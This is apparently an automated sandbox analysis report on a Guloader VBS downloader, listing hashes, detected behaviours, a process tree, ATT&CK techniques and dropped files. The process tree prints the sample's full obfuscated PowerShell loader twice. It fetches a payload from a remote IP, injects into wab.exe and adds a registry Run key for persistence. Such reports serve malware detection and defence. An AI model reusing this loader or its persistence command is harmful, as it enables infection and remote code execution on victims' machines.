Analysis

  • max time kernel
    141s
  • max time network
    126s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240611-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240611-enlocale:en-usos:windows10-2004-x64system
  • submitted
    25-06-2024 01:30

General

  • Target

    7050385c9ecb2aa84c11b687149985e1aa7a6868d4f63f6b214271d238be956c.vbs

  • Size

    23KB

  • MD5

    18a025babdc4df5cb74d565b1b93e1d6

  • SHA1

    f9bd62d75f8fd2e8327eea6b324b1c5dd3d880f3

  • SHA256

    7050385c9ecb2aa84c11b687149985e1aa7a6868d4f63f6b214271d238be956c

  • SHA512

    ff5126bcedf8d7d2927160161ae2c4ecae9fe1f561d97135e92c35c96b111753045b9a6e74529f086083778fcd017ed958a5b8066cb4dd7243c0473ae566978b

  • SSDEEP

    384:zDJcEgWPwf0ulPLLgoylkWz1vAaFYruA/du48nAv5PbK7L59LL/OF15JGty:zFcEgWIfttLKWs1v9erzdu48Av5PbIfU

Malware Config

Signatures

  • Guloader,Cloudeye

    A shellcode based downloader first seen in 2020.

  • Blocklisted process makes network request 1 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry key 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 19 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 21 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\7050385c9ecb2aa84c11b687149985e1aa7a6868d4f63f6b214271d238be956c.vbs"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:4068
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Kferters Nonfugitive Kapas Reinscribed Triarthrus Domba Simultanscenernes Pocket Goere Vagtmesters92';$Dowle = 1;Function Eleatic($Skglav){$Pendulant=$Skglav.Length-$Dowle;$Mousee84='SUBSTRIN';$Mousee84+='G';For( $Sporange=5;$Sporange -lt $Pendulant;$Sporange+=6){$Kferters+=$Skglav.$Mousee84.Invoke( $Sporange, $Dowle);}$Kferters;}function Polypragmonic($Inquilinous){ & ($Iltfattig) ($Inquilinous);}$Lrerstand247=Eleatic 'La piMAnfrsoShambzOfficiAtaralStadslKi,meaUnphi/.iffe5 r,ns.Fri e0Z.nks Opvas(TrimeW .ommi Inden MarkdBrabroSekunwalauds Feri KrokuNApollTBro t Bebyr1 jlde0Overf.Funkt0 Upra;ni.zs Bill.WSeacai S.ifnP rte6fodr,4Ester; A.ba Hexagx,nlad6Merce4 Fili;Refle Stoarsp,ltvA,ism:Chaun1devit2Teleg1 Fore.Stala0Frede)Indus ,adekGf.ligeTe,pecTile.kSammeobened/.ermi2 Mi.c0Shr,m1 Gele0Pseud0 Buld1Pet.t0Monit1Unclu Lav lFSkaariKartor,istreMezzofProtooCryptxCat.l/,nfol1Altde2Unlar1Forbr.Milde0Filma ';$Hexanaphthene=Eleatic 'UnripUVenansdepopeDenicr ellu-MembrAMizengBulnieInit nUndectUrban ';$Triarthrus=Eleatic 'Gled,hSandktUn,ostCaus,pflabb:Fejls/Speel/Bals 1 Ciga0Forha3Spira.Spagh1S.ing0.eneg6Jv st. Int.6Drmme7 Ulem.Rever1sep.a2Succe9Kommu/TruttC Ep.sa S ran BillcExag.eTre.arSinicr SkameSejtrgProteiExosksPhrygt SolbrDispoeA dent ortesArvin.AfanclC rtepUl,rak .opu ';$burrel=Eleatic 'Legis>Shrov ';$Iltfattig=Eleatic ' UnmoiVe ode Retsx .xti ';$Resflelsers='Pocket';$phenomenalistic = Eleatic 'T,rque loakcDegr.h prioUnimp Reger%Elucia RelipSvrmspTrykpdTaa,naBer,ntKurs aP ess%Tudbr\Diap,N ,aufaKreretfatuat Indre.tatsrhallugmele,a Tidsl masteUnjognTestasWid.i. ForsMTumb eEksp.d Br,n Iridi&Cou t&U pdr Unbeae TrylcBra,shM senoHered BoogitFe.ae ';Polypragmonic (Eleatic ' meta$CatawgPr,splUdstro Sca bLnm,daCu halE.nst:TitteAAnnekbregisrKinobiVirtuk IdleoLethasVegnem me,laPretor Pa,ymBegifeOptanlXanthaRetemdtaliseSmaglnPainfsOmdre=An en(Stramc ,hyrmper ed S.rg D sil/ Nedvcabide Ripst$ UndtpCordwhTidskeDi len ickeo,ebscmLaveee VildnVandkaBibellThyroiF,rtos Croct Dr,jiK,ghecA.wee)Alkox ');Polypragmonic (Eleatic ' Chud$InappgFalsklAmph.oPolypbTalmuaAppellfoku :OveruRStoreeDruesi FlamnOpsk.sMell.cP.ntarYakokiBeredb CakieS idsdR.fer=Older$Li,elTSanseraforii PtomaRatiorTor,etAnt,mhValgfr BambuHypomsPerip.Arunds EnwopHukoml lo,ei Col,tMana.(Ba se$Preprb S.uduAfblorSimplrB.ntueNock.lAbaxi)bolst ');Polypragmonic (Eleatic ' I gv[TilskNAnemoeDespot.urer. ntiS UnsuePartlrAn uvv ultiiFremmcGlggeehypocPReconoward.i,oadvnKrmmet,naldM f reaSparenka aka ChrogP.ebreDanserEjgil] L.st:Jorde:usporSf.agme DhabcTe.nouSamtarBrnepi Afr.t AktiyKakogP CenorE fagoCoccitBaginoMosekc.trygoQ,aicl Sold Bantu=Paral preoc[overcNSu,ere uretTar.a.EucalSBrekreSkindc.jrneuDominrBl,ndifo,ketFantay UnpoPL.deer,asseoContatPenlioPi.roc WhatoSligelMdrenT SubmyNonadp SkebeOstra] Boni: Mar,:As,ruTForholre.iasAn.ly1 Coop2Bovin ');$Triarthrus=$Reinscribed[0];$Sibilancy= (Eleatic ' Supe$TarbogProprlPulveoPleacbJavana.olsjlf.ske:Br,nkP,histr S preAmphisHjemliBykerfFem,lt Vagt2Kabel3 bede9Uncom=WinteN Cla,e Gur wKnap.-HulkhO UndiburorrjBagtaeH,potc an ltgibel SyrinS ,irkyDormas aspt ,safeSviptmE.sic.For.rNRed ceFluidtS.ovr.RektaW Abr eUm.ddbFr anCWoodilDryptiPomegeRenatnNo,cot');$Sibilancy+=$Abrikosmarmeladens[1];Polypragmonic ($Sibilancy);Polypragmonic (Eleatic 'Montr$ GoodPbrug rVerdeePi,cesstakoi byssfCounttSolbr2Kvikk3Lecks9.roch.Ung.iHSdesteCharaaMorgedG mcre piglr Makks Mand[S.mme$DykkeH Ruske SmokxLu enaInsecnpaahra Physp Dy fh Monit FalbhExpe.eRestrn Konge Dete]Fem.n=.tanc$LabioLcamelrStropeWay.irOppors So.utPerduaKaffenCulpadTyrol2S lsk4Sleat7 Naad ');$Herlas=Eleatic 'Ungli$ Aa ePGearvrDros.eAlarmsDa,sfiBaalff.haketDbena2Flora3Antip9flgev. BestDBe.aeoFremdwForstnRockilphaenoRemusapristdbesn,FDiffei UnhylUpwa,eReinc(Shiki$Sav.sTBlabmr Res.iL,mpha Ornir FilitskildhK,nder AntiuAgnizsDrift, Bark$AstroUZoomen Philb Dea.lconnaebronznUd incNaahihtmmeri A onnGi pogUdsa lR,ehay.hyli)Proje ';$Unblenchingly=$Abrikosmarmeladens[0];Polypragmonic (Eleatic 'Skorp$TrichgFragmlKonfeoMeva,bHjaelaMet,ll isoa:Tenanh ksneoTurfsrk mmasForstemisd.p GrapaCrysttAfdelh lexb=Backf(CykliTPra.ieFarmos Kompt Medu- jlePLievea Pr stUnmodhDemoc Glee$Ob,erUKollanTopunbCigarlVejrseWortsnun dvcB.omshPimpliOrininHegneg Ja,tlSacheyDobbe)S ill ');while (!$horsepath) {Polypragmonic (Eleatic 'hersk$KabelgFatuil StemoTil.jbDug ea,ortolBombe:bordaHUdnvneFasc lDesmet Cyane Toisd Mythi progg FejltAfboeeSa,ran Re.aepulersFo,ne=Afs.u$.engetRituar.nderu Ing,emilit ') ;Polypragmonic $Herlas;Polypragmonic (Eleatic ' U,plSBeskatBl,odaSolmorGarvetfirsa-SanscSNidstlcolybesainte Wildp tele chora4befol ');Polypragmonic (Eleatic 'Runei$Aabengfel.mlA ridoSup,rb HeweaKnuselkuver:ostrahOp.agoKautirVo.casKondee TrnipSporva Weigt DetrhMi.it= Cor,(YmperT Igane .letsDeplet,hoto-OmaniPTidebaAcinatLedgeh Vulc Ro le$ForbrUBeslgnShackbOnestlKunsteLoch,nSadelcStrenhBra,diGuld,n Sad gSignalLevetyRavne)Torr, ') ;Polypragmonic (Eleatic 'Oparb$Skralg F,ltlFortio unprbE hauaPass.lMilie:MoralKAfkrsaViraspFo itaForsisPros =Fotos$Disbogre.ogl App o LongbIndisaSpoillTil n: .utgN Enkeo Orn.n VenefGenseuBonedg ColliNon utDobbeiL dervKampmeForc.+.irok+ mack%rhaet$RhabdRLevereMin,ri ,ntenActinsOmdancExtrer,yfusi DissbRkkeueUn ondScree.Ansttc Eur.ofossru.althnAarsttDatas ') ;$Triarthrus=$Reinscribed[$Kapas];}$Alpid169=285050;$Krftcellen=28120;Polypragmonic (Eleatic 'Soldi$No,esgPar,dl,yggeo ,kkobBe pea InstlHeksa:DemisG Bas.oUren eSpej.r Skrsepil s Enked=Outsi ,erumGSha.te plurtClear-BilleCPennyo ProbnCandutvalbye Tr enPaatetDi ku In.e$ LyskUFrstenPrerobSkystlBro.ee RoyanChamfcKa,tohInd aiPasten,ocesgStylolP otoy B,oc ');Polypragmonic (Eleatic ' Proi$Afsm.g,nsatlDirekoUnderbtelega XenolO ont: Re,rmRetr.a I.pogHaed.tZi,pesDherip C.umrWa,kiogalejgS,ramsSithe Co,vi=Antia odif[ blokS imenyThearsOverstReture .ontmD,cry..mphiC B jaoCommon,ottsvS.umse HandrversitKontr]Sempe: D.pr:Fl,gtFF.rinr Pit oIndanmFasciB PandabaandsrelateD ris6 Adst4RedbeSHornltLabelr.ersoi eputnSteckgHaema(Fo.ds$DegueGMassaoKlas,e HandrNosopeMi,ut)Cadge ');Polypragmonic (Eleatic ' He.l$RapatgRi ualStrimo primbTvre,aLabbelFeria:T.bakMscr.uoTam.onDefibtSabbae,imerrGnaskeHu ann disbdFejlmeM dersTekst Indig=Kl.mm Sttte[InhalS A,beyhypers.isagtHemiseIntrom Radi.dubisTFasteeVrd gxLubr tSpkni.StrumE E.bonUltracKri toGeo.odCoanuiUngosn .issg rada]Parts:Vi ce: p.akAMi.joShjre,CalfelI Ky,hIAchro..ndocGsmooteBestst Ou.cSPronitPen.urAfl eiEvolunKlvergMedy (re,ge$sigbjmAvidoaFiskegProsptMuttos HaanpUne,orGran,o TogfgCountsSe.qu)thing ');Polypragmonic (Eleatic 'Xan.h$ Reimg conolSign,oElsewbGribea ,etrl Nucl:ElectPFullooGamlioVask,lAflvnhB,gataOms,al C.eel Futu=Und.r$MarioMIndbio DaftnHabittcorozeVesterPaloneFishpnAgnesdPanate KeglsMedio.OkkersNon,muFurnibMorgusDucaltSoranrKontriLie,hnFaldegQue i(Cauks$UnshaAGeneolM,rkepLavagiVerdedWicke1Lvspr6I sen9 Int,, Cigs$VidunK,eforrKatatfAtomptDisprcKlun,eEpihilUtil,lLead.eHumorneuxan),iskr ');Polypragmonic $Poolhall;"
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3676
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Nattergalens.Med && echo t"
        3⤵
          PID:2000
        • C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Kferters Nonfugitive Kapas Reinscribed Triarthrus Domba Simultanscenernes Pocket Goere Vagtmesters92';$Dowle = 1;Function Eleatic($Skglav){$Pendulant=$Skglav.Length-$Dowle;$Mousee84='SUBSTRIN';$Mousee84+='G';For( $Sporange=5;$Sporange -lt $Pendulant;$Sporange+=6){$Kferters+=$Skglav.$Mousee84.Invoke( $Sporange, $Dowle);}$Kferters;}function Polypragmonic($Inquilinous){ & ($Iltfattig) ($Inquilinous);}$Lrerstand247=Eleatic 'La piMAnfrsoShambzOfficiAtaralStadslKi,meaUnphi/.iffe5 r,ns.Fri e0Z.nks Opvas(TrimeW .ommi Inden MarkdBrabroSekunwalauds Feri KrokuNApollTBro t Bebyr1 jlde0Overf.Funkt0 Upra;ni.zs Bill.WSeacai S.ifnP rte6fodr,4Ester; A.ba Hexagx,nlad6Merce4 Fili;Refle Stoarsp,ltvA,ism:Chaun1devit2Teleg1 Fore.Stala0Frede)Indus ,adekGf.ligeTe,pecTile.kSammeobened/.ermi2 Mi.c0Shr,m1 Gele0Pseud0 Buld1Pet.t0Monit1Unclu Lav lFSkaariKartor,istreMezzofProtooCryptxCat.l/,nfol1Altde2Unlar1Forbr.Milde0Filma ';$Hexanaphthene=Eleatic 'UnripUVenansdepopeDenicr ellu-MembrAMizengBulnieInit nUndectUrban ';$Triarthrus=Eleatic 'Gled,hSandktUn,ostCaus,pflabb:Fejls/Speel/Bals 1 Ciga0Forha3Spira.Spagh1S.ing0.eneg6Jv st. Int.6Drmme7 Ulem.Rever1sep.a2Succe9Kommu/TruttC Ep.sa S ran BillcExag.eTre.arSinicr SkameSejtrgProteiExosksPhrygt SolbrDispoeA dent ortesArvin.AfanclC rtepUl,rak .opu ';$burrel=Eleatic 'Legis>Shrov ';$Iltfattig=Eleatic ' UnmoiVe ode Retsx .xti ';$Resflelsers='Pocket';$phenomenalistic = Eleatic 'T,rque loakcDegr.h prioUnimp Reger%Elucia RelipSvrmspTrykpdTaa,naBer,ntKurs aP ess%Tudbr\Diap,N ,aufaKreretfatuat Indre.tatsrhallugmele,a Tidsl masteUnjognTestasWid.i. ForsMTumb eEksp.d Br,n Iridi&Cou t&U pdr Unbeae TrylcBra,shM senoHered BoogitFe.ae ';Polypragmonic (Eleatic ' meta$CatawgPr,splUdstro Sca bLnm,daCu halE.nst:TitteAAnnekbregisrKinobiVirtuk IdleoLethasVegnem me,laPretor Pa,ymBegifeOptanlXanthaRetemdtaliseSmaglnPainfsOmdre=An en(Stramc ,hyrmper ed S.rg D sil/ Nedvcabide Ripst$ UndtpCordwhTidskeDi len ickeo,ebscmLaveee VildnVandkaBibellThyroiF,rtos Croct Dr,jiK,ghecA.wee)Alkox ');Polypragmonic (Eleatic ' Chud$InappgFalsklAmph.oPolypbTalmuaAppellfoku :OveruRStoreeDruesi FlamnOpsk.sMell.cP.ntarYakokiBeredb CakieS idsdR.fer=Older$Li,elTSanseraforii PtomaRatiorTor,etAnt,mhValgfr BambuHypomsPerip.Arunds EnwopHukoml lo,ei Col,tMana.(Ba se$Preprb S.uduAfblorSimplrB.ntueNock.lAbaxi)bolst ');Polypragmonic (Eleatic ' I gv[TilskNAnemoeDespot.urer. ntiS UnsuePartlrAn uvv ultiiFremmcGlggeehypocPReconoward.i,oadvnKrmmet,naldM f reaSparenka aka ChrogP.ebreDanserEjgil] L.st:Jorde:usporSf.agme DhabcTe.nouSamtarBrnepi Afr.t AktiyKakogP CenorE fagoCoccitBaginoMosekc.trygoQ,aicl Sold Bantu=Paral preoc[overcNSu,ere uretTar.a.EucalSBrekreSkindc.jrneuDominrBl,ndifo,ketFantay UnpoPL.deer,asseoContatPenlioPi.roc WhatoSligelMdrenT SubmyNonadp SkebeOstra] Boni: Mar,:As,ruTForholre.iasAn.ly1 Coop2Bovin ');$Triarthrus=$Reinscribed[0];$Sibilancy= (Eleatic ' Supe$TarbogProprlPulveoPleacbJavana.olsjlf.ske:Br,nkP,histr S preAmphisHjemliBykerfFem,lt Vagt2Kabel3 bede9Uncom=WinteN Cla,e Gur wKnap.-HulkhO UndiburorrjBagtaeH,potc an ltgibel SyrinS ,irkyDormas aspt ,safeSviptmE.sic.For.rNRed ceFluidtS.ovr.RektaW Abr eUm.ddbFr anCWoodilDryptiPomegeRenatnNo,cot');$Sibilancy+=$Abrikosmarmeladens[1];Polypragmonic ($Sibilancy);Polypragmonic (Eleatic 'Montr$ GoodPbrug rVerdeePi,cesstakoi byssfCounttSolbr2Kvikk3Lecks9.roch.Ung.iHSdesteCharaaMorgedG mcre piglr Makks Mand[S.mme$DykkeH Ruske SmokxLu enaInsecnpaahra Physp Dy fh Monit FalbhExpe.eRestrn Konge Dete]Fem.n=.tanc$LabioLcamelrStropeWay.irOppors So.utPerduaKaffenCulpadTyrol2S lsk4Sleat7 Naad ');$Herlas=Eleatic 'Ungli$ Aa ePGearvrDros.eAlarmsDa,sfiBaalff.haketDbena2Flora3Antip9flgev. BestDBe.aeoFremdwForstnRockilphaenoRemusapristdbesn,FDiffei UnhylUpwa,eReinc(Shiki$Sav.sTBlabmr Res.iL,mpha Ornir FilitskildhK,nder AntiuAgnizsDrift, Bark$AstroUZoomen Philb Dea.lconnaebronznUd incNaahihtmmeri A onnGi pogUdsa lR,ehay.hyli)Proje ';$Unblenchingly=$Abrikosmarmeladens[0];Polypragmonic (Eleatic 'Skorp$TrichgFragmlKonfeoMeva,bHjaelaMet,ll isoa:Tenanh ksneoTurfsrk mmasForstemisd.p GrapaCrysttAfdelh lexb=Backf(CykliTPra.ieFarmos Kompt Medu- jlePLievea Pr stUnmodhDemoc Glee$Ob,erUKollanTopunbCigarlVejrseWortsnun dvcB.omshPimpliOrininHegneg Ja,tlSacheyDobbe)S ill ');while (!$horsepath) {Polypragmonic (Eleatic 'hersk$KabelgFatuil StemoTil.jbDug ea,ortolBombe:bordaHUdnvneFasc lDesmet Cyane Toisd Mythi progg FejltAfboeeSa,ran Re.aepulersFo,ne=Afs.u$.engetRituar.nderu Ing,emilit ') ;Polypragmonic $Herlas;Polypragmonic (Eleatic ' U,plSBeskatBl,odaSolmorGarvetfirsa-SanscSNidstlcolybesainte Wildp tele chora4befol ');Polypragmonic (Eleatic 'Runei$Aabengfel.mlA ridoSup,rb HeweaKnuselkuver:ostrahOp.agoKautirVo.casKondee TrnipSporva Weigt DetrhMi.it= Cor,(YmperT Igane .letsDeplet,hoto-OmaniPTidebaAcinatLedgeh Vulc Ro le$ForbrUBeslgnShackbOnestlKunsteLoch,nSadelcStrenhBra,diGuld,n Sad gSignalLevetyRavne)Torr, ') ;Polypragmonic (Eleatic 'Oparb$Skralg F,ltlFortio unprbE hauaPass.lMilie:MoralKAfkrsaViraspFo itaForsisPros =Fotos$Disbogre.ogl App o LongbIndisaSpoillTil n: .utgN Enkeo Orn.n VenefGenseuBonedg ColliNon utDobbeiL dervKampmeForc.+.irok+ mack%rhaet$RhabdRLevereMin,ri ,ntenActinsOmdancExtrer,yfusi DissbRkkeueUn ondScree.Ansttc Eur.ofossru.althnAarsttDatas ') ;$Triarthrus=$Reinscribed[$Kapas];}$Alpid169=285050;$Krftcellen=28120;Polypragmonic (Eleatic 'Soldi$No,esgPar,dl,yggeo ,kkobBe pea InstlHeksa:DemisG Bas.oUren eSpej.r Skrsepil s Enked=Outsi ,erumGSha.te plurtClear-BilleCPennyo ProbnCandutvalbye Tr enPaatetDi ku In.e$ LyskUFrstenPrerobSkystlBro.ee RoyanChamfcKa,tohInd aiPasten,ocesgStylolP otoy B,oc ');Polypragmonic (Eleatic ' Proi$Afsm.g,nsatlDirekoUnderbtelega XenolO ont: Re,rmRetr.a I.pogHaed.tZi,pesDherip C.umrWa,kiogalejgS,ramsSithe Co,vi=Antia odif[ blokS imenyThearsOverstReture .ontmD,cry..mphiC B jaoCommon,ottsvS.umse HandrversitKontr]Sempe: D.pr:Fl,gtFF.rinr Pit oIndanmFasciB PandabaandsrelateD ris6 Adst4RedbeSHornltLabelr.ersoi eputnSteckgHaema(Fo.ds$DegueGMassaoKlas,e HandrNosopeMi,ut)Cadge ');Polypragmonic (Eleatic ' He.l$RapatgRi ualStrimo primbTvre,aLabbelFeria:T.bakMscr.uoTam.onDefibtSabbae,imerrGnaskeHu ann disbdFejlmeM dersTekst Indig=Kl.mm Sttte[InhalS A,beyhypers.isagtHemiseIntrom Radi.dubisTFasteeVrd gxLubr tSpkni.StrumE E.bonUltracKri toGeo.odCoanuiUngosn .issg rada]Parts:Vi ce: p.akAMi.joShjre,CalfelI Ky,hIAchro..ndocGsmooteBestst Ou.cSPronitPen.urAfl eiEvolunKlvergMedy (re,ge$sigbjmAvidoaFiskegProsptMuttos HaanpUne,orGran,o TogfgCountsSe.qu)thing ');Polypragmonic (Eleatic 'Xan.h$ Reimg conolSign,oElsewbGribea ,etrl Nucl:ElectPFullooGamlioVask,lAflvnhB,gataOms,al C.eel Futu=Und.r$MarioMIndbio DaftnHabittcorozeVesterPaloneFishpnAgnesdPanate KeglsMedio.OkkersNon,muFurnibMorgusDucaltSoranrKontriLie,hnFaldegQue i(Cauks$UnshaAGeneolM,rkepLavagiVerdedWicke1Lvspr6I sen9 Int,, Cigs$VidunK,eforrKatatfAtomptDisprcKlun,eEpihilUtil,lLead.eHumorneuxan),iskr ');Polypragmonic $Poolhall;"
          3⤵
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:3404
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Nattergalens.Med && echo t"
            4⤵
              PID:5088
            • C:\Program Files (x86)\windows mail\wab.exe
              "C:\Program Files (x86)\windows mail\wab.exe"
              4⤵
              • Suspicious use of NtCreateThreadExHideFromDebugger
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of WriteProcessMemory
              PID:1836
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Kajpladsens115" /t REG_EXPAND_SZ /d "%Touchere% -w 1 $Limpish=(Get-ItemProperty -Path 'HKCU:\lewing\').Kapitalkonti;%Touchere% ($Limpish)"
                5⤵
                • Suspicious use of WriteProcessMemory
                PID:4820
                • C:\Windows\SysWOW64\reg.exe
                  REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Kajpladsens115" /t REG_EXPAND_SZ /d "%Touchere% -w 1 $Limpish=(Get-ItemProperty -Path 'HKCU:\lewing\').Kapitalkonti;%Touchere% ($Limpish)"
                  6⤵
                  • Adds Run key to start application
                  • Modifies registry key
                  PID:3524

      Network

      MITRE ATT&CK Matrix ATT&CK v13

      Persistence

      Boot or Logon Autostart Execution

      1
      T1547

      Registry Run Keys / Startup Folder

      1
      T1547.001

      Privilege Escalation

      Boot or Logon Autostart Execution

      1
      T1547

      Registry Run Keys / Startup Folder

      1
      T1547.001

      Defense Evasion

      Modify Registry

      2
      T1112

      Discovery

      Query Registry

      1
      T1012

      System Information Discovery

      2
      T1082

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_xausm2rp.nrn.ps1
        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      • C:\Users\Admin\AppData\Roaming\Nattergalens.Med
        Filesize

        407KB

        MD5

        bc4f5aff2f4ae56dce61f5e04f8613eb

        SHA1

        6fa50ea97319650309e96b55696c198003634874

        SHA256

        7ecf5fecf64cf7d7f0f6bcae993f1f35687ae5c37eb3a80bd7422eb4eb1f6114

        SHA512

        a6adcda7a3ac80f1283590055890af00d83db9f0cc72a3c241b767dc9931fdad77723d6ca39ea7489d72dd9144d788e001f4c6341b4fa52e9399add295359a0d

      • memory/1836-50-0x0000000000FF0000-0x0000000004F88000-memory.dmp
        Filesize

        63.6MB

      • memory/1836-42-0x0000000000FF0000-0x0000000004F88000-memory.dmp
        Filesize

        63.6MB

      • memory/3404-16-0x0000000004F20000-0x0000000005548000-memory.dmp
        Filesize

        6.2MB

      • memory/3404-34-0x0000000006FC0000-0x0000000007056000-memory.dmp
        Filesize

        600KB

      • memory/3404-38-0x0000000008720000-0x000000000C6B8000-memory.dmp
        Filesize

        63.6MB

      • memory/3404-17-0x0000000004E60000-0x0000000004E82000-memory.dmp
        Filesize

        136KB

      • memory/3404-18-0x0000000005590000-0x00000000055F6000-memory.dmp
        Filesize

        408KB

      • memory/3404-19-0x00000000056B0000-0x0000000005716000-memory.dmp
        Filesize

        408KB

      • memory/3404-29-0x0000000005720000-0x0000000005A74000-memory.dmp
        Filesize

        3.3MB

      • memory/3404-30-0x0000000005D00000-0x0000000005D1E000-memory.dmp
        Filesize

        120KB

      • memory/3404-31-0x0000000005D50000-0x0000000005D9C000-memory.dmp
        Filesize

        304KB

      • memory/3404-32-0x0000000007540000-0x0000000007BBA000-memory.dmp
        Filesize

        6.5MB

      • memory/3404-33-0x0000000006280000-0x000000000629A000-memory.dmp
        Filesize

        104KB

      • memory/3404-15-0x0000000002420000-0x0000000002456000-memory.dmp
        Filesize

        216KB

      • memory/3404-35-0x0000000006F50000-0x0000000006F72000-memory.dmp
        Filesize

        136KB

      • memory/3404-36-0x0000000008170000-0x0000000008714000-memory.dmp
        Filesize

        5.6MB

      • memory/3676-12-0x00007FFDD7F40000-0x00007FFDD8A01000-memory.dmp
        Filesize

        10.8MB

      • memory/3676-0-0x00007FFDD7F43000-0x00007FFDD7F45000-memory.dmp
        Filesize

        8KB

      • memory/3676-39-0x00007FFDD7F40000-0x00007FFDD8A01000-memory.dmp
        Filesize

        10.8MB

      • memory/3676-40-0x00007FFDD7F43000-0x00007FFDD7F45000-memory.dmp
        Filesize

        8KB

      • memory/3676-1-0x00007FFDD7F40000-0x00007FFDD8A01000-memory.dmp
        Filesize

        10.8MB

      • memory/3676-45-0x00007FFDD7F40000-0x00007FFDD8A01000-memory.dmp
        Filesize

        10.8MB

      • memory/3676-2-0x000002BE88530000-0x000002BE88552000-memory.dmp
        Filesize

        136KB